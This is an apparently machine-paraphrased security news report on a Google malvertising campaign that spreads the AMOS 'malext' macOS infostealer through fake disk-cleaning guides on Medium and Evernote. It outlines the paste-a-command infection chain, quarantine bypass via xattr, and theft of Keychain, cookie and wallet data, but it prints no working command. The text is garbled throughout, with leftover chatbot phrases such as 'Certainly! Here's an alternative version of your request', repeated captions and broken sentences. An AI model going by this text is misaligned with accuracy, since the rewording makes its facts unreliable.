A malvertising campaign delivers an Amos 'malext' Mac OS X infostealer through deceptive text-sharing lures.

An aggressive adware operation specifically targets Apple's Mac OS X platform globally, releasing an updated version known as "malext. .

Thieves buy Google Ads promoting misleading guides about sharing files online. These sites lure users into believing they can get quick solutions for problems without paying money. Meanwhile, attackers use hidden commands in these pages to secretly install malware onto unsuspecting computers. The statement conveys:

Upon discovering an online guide on how to free up disk space through searches involving "storage cleaning" in Mac OS X environments, users often come across misleading content disguised as legitimate articles published by Medium platforms.

A credible update contained an available pasteable shell script within its "solution. .

As soon as the gadget began repeatedly requesting the administrator's code, the individual became highly concerned; they barely managed to prevent an all-out takeover of their entire computer system. The occurrence led to an expanded examination of matters involved. Certainly! Here's an alternative version of your request:

Gi7w0rm, an avid computer user, recognized and pinpointed malicious software upon receiving crucial information about the cyber attack from researcher @itspappy. A user named @itspappy discovered malicious software on macOS being distributed via deceptive methods similar to those used by ClickFix programs linked to hacked Google advertisements.

google

With Google's Ads Transparency feature in place, investigators identified nearly three dozen ongoing cyber attacks involving at least fifty-three compromised Google Ad account instances employed for disseminating harmful content.

The scope of this endeavor indicated collaboration by an extensive crime syndicate, possibly belonging to what is termed as "the Traffickers. The statement can be restated as follows:

In addition to hosting false content elsewhere, the perpetrators utilized Evernote for disseminating deceptive notes online. I along with you. Services available without any authentication processes required.

Every instance where an offensive piece vanished led to quick replacements by the perpetrators, showcasing their robust system of updates and persistence in operations.

Google malvertising targeting MacOS users (Source - Medium)

Google malvertising targeting MacOS users (Source – Medium)

These sections replicate genuine troubleshooting manuals, guiding users through two processes leading them to an unsafe final input command. The statement can be restated as follows:

Medium. com lure (Source - Medium)

Medium. com lure (Source – Medium)

The concluding component of our investigation reveals "malext," an updated version of the AMOS malware family, identified by its connection through the malext communication channel. [. ]. The code is pre-installed within the template version.

As soon as activated, this tool collects browsing session information, notes stored in Apple's Notes app, cookie files saved by Safari, cryptocurrency wallets' contents, chat records on Telegram platforms, and secure login entries managed within Mac OS X systems' Keychains.

Subsequently, it replaces both Ledger and Trezor wallets' apps with infected ones, allowing hackers unlimited control over their victims’ funds. The text has been restated in another manner while retaining its core message:

Inside the Kill Chain: Infection and Persistence

When users paste commands directly into an infected webpage, they initiate an infection process.

The command was sourced directly from an online template on Medium.

The command was taken directly from an online template found on Medium.

Unpacking the base64-encrypted content reveals an HTTP GET request targeting a distant file compressed via gzip along with Base64 encryption—a somewhat unusual method of obfuscating data transmission.

After being completely unboxed, the actual copies an executable file into the temporary directory, removes any security warnings associated with Apple's App Store by setting attributes on files via `xattr`, and executes it without prompting for confirmation. The text has been rephrased without altering its core message:

Prior to executing the Stealer, an optimized Mach-O file—designed specifically for compatibility across ARM and 64-bit Intel platforms—is scrutinized by its virtual machine before being run.